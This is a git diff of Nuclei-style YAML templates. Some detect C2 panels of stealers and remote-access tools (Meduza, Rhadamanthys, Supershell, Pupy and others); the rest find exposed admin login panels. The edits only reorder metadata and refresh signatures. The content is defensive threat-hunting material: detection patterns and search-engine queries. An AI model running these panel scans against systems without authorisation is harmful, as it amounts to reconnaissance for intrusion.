description: | Hookbot panel were detected. metadata: - verified: true max-request: 1 shodan-query: title:"hookbot" + verified: true tags: tech,rat,hookbot,c2,panel,detect http: @@ -21,5 +21,4 @@ http: - type: dsl dsl: - "status_code == 200 && contains(body, 'HOOKBOT PANEL')" - -# digest: 4b0a00483046022100f6eb69f310282a5fdf8ee4c6b9335ea0c00b6ae05c95f08e54a552eb95e191f0022100f8ace87e1b0e56e5e8bacfedb2a0708f1b027ba0863810fed9757eae4b48fdb0:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203e86af1fb29c1715c97a32465f34376122be2577244cced96954af6edabc4882022100ee3cae8088ba6cffea93389f69192b70a7e712960b1a217a555941b8fe806b7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/meduza-stealer.yaml b/http/exposed-panels/c2/meduza-stealer.yaml index 1c8981403a..d0656a3536 100644 --- a/http/exposed-panels/c2/meduza-stealer.yaml +++ b/http/exposed-panels/c2/meduza-stealer.yaml @@ -7,9 +7,9 @@ info: description: | Meduza Stealer panel were detected. metadata: - verified: "true" max-request: 1 shodan-query: http.title:"Meduza Stealer" + verified: "true" tags: rat,meduza-stealer,c2,panel http: @@ -29,4 +29,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205dba3fbe856939cb875cb89322ca202e324f3de5f27798d0dafa5775d01b8b67022052e12e59e6740e0f43bb43bbea4b9c3a20f7853360e5c218ef51005a22683fbd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201857c90bb4873d74e64cdd0d581741a34b5ab85e305a1859784ee605c3badde6022100b2e004b0c7a1761427d06cd37b47dc320a2cb4626e027d5c9fb1ed9a032a7157:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/mystic-stealer.yaml b/http/exposed-panels/c2/mystic-stealer.yaml index 6a7ef02fd7..cb4971803b 100644 --- a/http/exposed-panels/c2/mystic-stealer.yaml +++ b/http/exposed-panels/c2/mystic-stealer.yaml @@ -7,9 +7,9 @@ info: description: | Mystic Stealer panel were detected. metadata: - verified: "true" max-request: 1 shodan-query: http.title:"Mystic Stealer" + verified: "true" tags: tech,rat,mystic-stealer,c2,panel http: @@ -23,5 +23,4 @@ http: dsl: - "status_code == 200 && contains(body, 'Mystic Stealer')" condition: and - -# digest: 4a0a00473045022100fcf266ccd2df62026e9bf5277b3f0d485aa4210f56ab1dfc879be2862d69d0b0022042c790a61b70a371b8995a6816d82fe76671b7ef287fc7062063cf58d107f15e:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221009db30abfeb0ff686a7c28a4f176d17f1ef592748be4fd65a61ecc98bf88cb2a6022100d22a311a14764af1763bd5a9aad21c20cdf9dc3c143fac6b6756c6e0c9f9f60c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/mythic-c2.yaml b/http/exposed-panels/c2/mythic-c2.yaml index 37acda5822..6c80b2a5fb 100644 --- a/http/exposed-panels/c2/mythic-c2.yaml +++ b/http/exposed-panels/c2/mythic-c2.yaml @@ -10,9 +10,9 @@ info: reference: | https://www.socinvestigation.com/shodan-filters-to-hunt-adversaries-infrastructure-and-c2/ metadata: - verified: true max-request: 1 - shodan-query: 'ssl:Mythic port:7443' + shodan-query: ssl:Mythic port:7443 + verified: true tags: c2,ir,osint,mythic,panel http: @@ -30,5 +30,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402205fb0ec6f37a8081a8891b1ebe5a41f81efe41a607236adc1e5238b02d8a94fd7022037a39c116d0bdbaea5b37bd6d9cae434195a5270687a4d9036c2603a6012b701:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c6d5765201b97e132cd0677063e317267a751e67632712b285e240c66433f4be02207480243445c64e44010d2894574344cebd20434e132ebb8fd910758534594cb2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/nh-c2.yaml b/http/exposed-panels/c2/nh-c2.yaml index 036ce7a476..4dc4466b6a 100644 --- a/http/exposed-panels/c2/nh-c2.yaml +++ b/http/exposed-panels/c2/nh-c2.yaml @@ -7,9 +7,9 @@ info: reference: - https://twitter.com/MichalKoczwara/status/1616179246216396806 metadata: - verified: "true" - max-request: 1 censys-query: 10baf5fcdde4563d3e145a1f553ae433fb1c3572 + max-request: 1 + verified: "true" tags: tech,nh,c2,panel http: @@ -24,5 +24,4 @@ http: - "status_code == 301 && status_code == 302" - "(\"03609e8e4a0a0ef888327d64ae2dc8950664219e\" == sha1(body))" condition: and - -# digest: 490a0046304402202bc602a26fa23756d2ccf8126c2313d153cb3cf7b77e4aeafc10724dbc02822402206c55dd8d82898685d8489ce21b1705d04879d827b2db1716a062392e6feb4898:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022063ab516462741e34434d9a9c199377f80e51f522197cb6175504b98fb36141ff02207115b32c0520afbef3c6ed48d4e3e67fc99ad28aa45a8bab9df3384082e67fe3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/pupyc2.yaml b/http/exposed-panels/c2/pupyc2.yaml index 1c7048d462..694db8c8f7 100644 --- a/http/exposed-panels/c2/pupyc2.yaml +++ b/http/exposed-panels/c2/pupyc2.yaml @@ -10,9 +10,9 @@ info: - https://twitter.com/TLP_R3D/status/1654038602282565632 - https://github.com/n1nj4sec/pupy metadata: - verified: true max-request: 1 shodan-query: aa3939fc357723135870d5036b12a67097b03309 + verified: true tags: c2,ir,osint,pupyc2,panel http: @@ -30,4 +30,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fa71c1e22038c75eaf6c497340b1f33ecf41c7228c34fc55da3435f5aab87c630221009364ce11f0b2a1d097c1cf72429d5c9f8ca31a489b740af6e2a89ec7338c2a84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022057d29d7d97cb13a9a35b89dfe318ef030a1df69dbfd1e8a21132fcc0e64b69e2022100bb254b2c1afde50e7e251ed8126e89f75d49eb9b91445812280bf608165ce082:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml b/http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml index 7fb3c84124..02959fa844 100644 --- a/http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml +++ b/http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml @@ -8,8 +8,8 @@ info: - https://twitter.com/0xperator/status/1677873700610162690 - https://github.com/alex14324/Rhadamanthys-Stealer metadata: - verified: true max-request: 1 + verified: true tags: c2,rhadamanthys,stealer,panel http: @@ -29,5 +29,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022058c0be8153d5d79b10702c1aabe4dccf03e18422bebdc3147a74f809a88b892002201f5d727149212fc2c3f70afcf7281355fbe6b09f1af935b20849289d8d2da270:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221008232f0584107ae1208f1df5e74e599ae1b886c4b700ee62ab850b0b0e929b705022100b3ae8d19dc7d1f170d92c55ad3891d4f79c2c913851eef6d95e7c4d52aaa34ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/supershell-c2.yaml b/http/exposed-panels/c2/supershell-c2.yaml index dbb61f46d1..0de7bff39c 100644 --- a/http/exposed-panels/c2/supershell-c2.yaml +++ b/http/exposed-panels/c2/supershell-c2.yaml @@ -10,9 +10,9 @@ info: - https://twitter.com/S4nsLimit3/status/1693619836339859497 - https://github.com/tdragon6/Supershell/blob/main/README_EN.md metadata: - verified: true - max-request: 1 fofa-query: icon_hash="-1010228102" + max-request: 1 + verified: true tags: c2,ir,osint,supershell,panel http: @@ -31,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bdce1bbaea1c70968c31ec72bb56feee26a202a8f6b08265fbbf159cc16640b102210091eb2061e5587873505478b7cea53cf34485dd1b75b300f4c1f6c52d5c905a48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210091de6113e88b1dac039795b04c1f74947aa27064d8d904ce5d2937331374af5f02207cb591a3025a268582238d89c37bc1d84dd912fb05d35e71d9480d7a3cc9fd8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/viper-c2.yaml b/http/exposed-panels/c2/viper-c2.yaml index 75cbe28907..88ce93aee0 100644 --- a/http/exposed-panels/c2/viper-c2.yaml +++ b/http/exposed-panels/c2/viper-c2.yaml @@ -9,10 +9,10 @@ info: reference: - https://twitter.com/MichalKoczwara/status/1635724410274414596 metadata: - verified: "true" + censys-query: 057f3b5488605b4d224d038e340866e2cdfed4a3 max-request: 1 shodan-query: http.html_hash:1015055567 - censys-query: 057f3b5488605b4d224d038e340866e2cdfed4a3 + verified: "true" tags: tech,viper,c2,malware,ir,panel http: @@ -27,5 +27,4 @@ http: - "status_code == 404" - "(\"057f3b5488605b4d224d038e340866e2cdfed4a3\" == sha1(body))" condition: and - -# digest: 4a0a00473045022048363acbfdf74cf2d5818b88c21ec61d8d357f18064c49df6adbf11c91421ac0022100f1897abf0a6dd7fd9e132c38a9e142c7e1997a1408790487d4a7a9163b2d4c56:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d611d7a526bfb1c041ade83ada99949e2306854350ec715f40beba72ec98b6b10220406bc07f5bb48c3398fe534d989b2ab250b58eddc9592bb4933702801b491073:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cacti-panel.yaml b/http/exposed-panels/cacti-panel.yaml index 236ecc323f..c619f5efa4 100644 --- a/http/exposed-panels/cacti-panel.yaml +++ b/http/exposed-panels/cacti-panel.yaml @@ -9,12 +9,12 @@ info: - https://www.cacti.net/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:* metadata: max-request: 2 - vendor: cacti product: cacti + vendor: cacti tags: tech,cacti,login,panel http: @@ -49,4 +49,4 @@ http: group: 1 regex: - "
Version (.*) |" -# digest: 490a004630440220144907b46f9dbf2c69d839e327aa09ded41828ef6e558dbac80f141401f205f902203009dea7af15c26ed9c00fb89d8c50a440569447a4350dab08a2a1d306ab7bda:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210091466c451eb83a632009e16596e016864e58809145127b30333708c9965f718a0220698ba9fb6b9818ed4c6441084c12df39731e4a6124c062b93ca178bc2abd5ea4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/calendarix-panel.yaml b/http/exposed-panels/calendarix-panel.yaml index 00f326d14e..e4abea2ea1 100644 --- a/http/exposed-panels/calendarix-panel.yaml +++ b/http/exposed-panels/calendarix-panel.yaml @@ -7,7 +7,6 @@ info: description: Calendarix admin login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 2 @@ -28,5 +27,4 @@ http: - type: word words: - 'Calendarix Admin Login' - -# digest: 4a0a0047304502207bf83c8eda03dedcb304b256cc3edbd8bf51e0bec7e13ad3851d231b574db678022100de07dffbeb5396bb4646154bcf00ceca71cc39c25de64d9aa710dc2fd630a8be:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b34a5c97991ad1f12a734a28ed63791722bfaa09e4c327e749c4d88caa397bb8022100d22a6fd1397579615feed0f88c3b864c9be24da3e1e16a39a09d9129e25946bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/call-break-cms.yaml b/http/exposed-panels/call-break-cms.yaml index 222ed6361b..a72575d851 100644 --- a/http/exposed-panels/call-break-cms.yaml +++ b/http/exposed-panels/call-break-cms.yaml @@ -7,7 +7,6 @@ info: description: Call Break CMS panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -23,5 +22,4 @@ http: words: - 'Call Break CMS' condition: and - -# digest: 4b0a004830460221008e89f3f9832f6738838ee7d1dd6856db253f14ad14658081f897dee48f37566a022100d724aa5821cb3bb19204d00244e4facb9931b3ef844b00696e461d0504cb8e6a:922c64590222798bb761d5b6d8e72950 +# digest: 480a00453043021f34c8e899d9e93e24456d62c1378b164bf525bd836aa5862222cc58841dcc5402207f56cc0a6dd5cdf40ed31c5e90807dc04f8bffc279222d4a4aeef3c111de7763:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/camunda-login-panel.yaml b/http/exposed-panels/camunda-login-panel.yaml index 195e594fc0..440b91012e 100644 --- a/http/exposed-panels/camunda-login-panel.yaml +++ b/http/exposed-panels/camunda-login-panel.yaml @@ -9,7 +9,6 @@ info: - https://docs.camunda.org/manual/7.15/webapps/admin/user-management/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 2 @@ -37,5 +36,4 @@ http: group: 1 regex: - '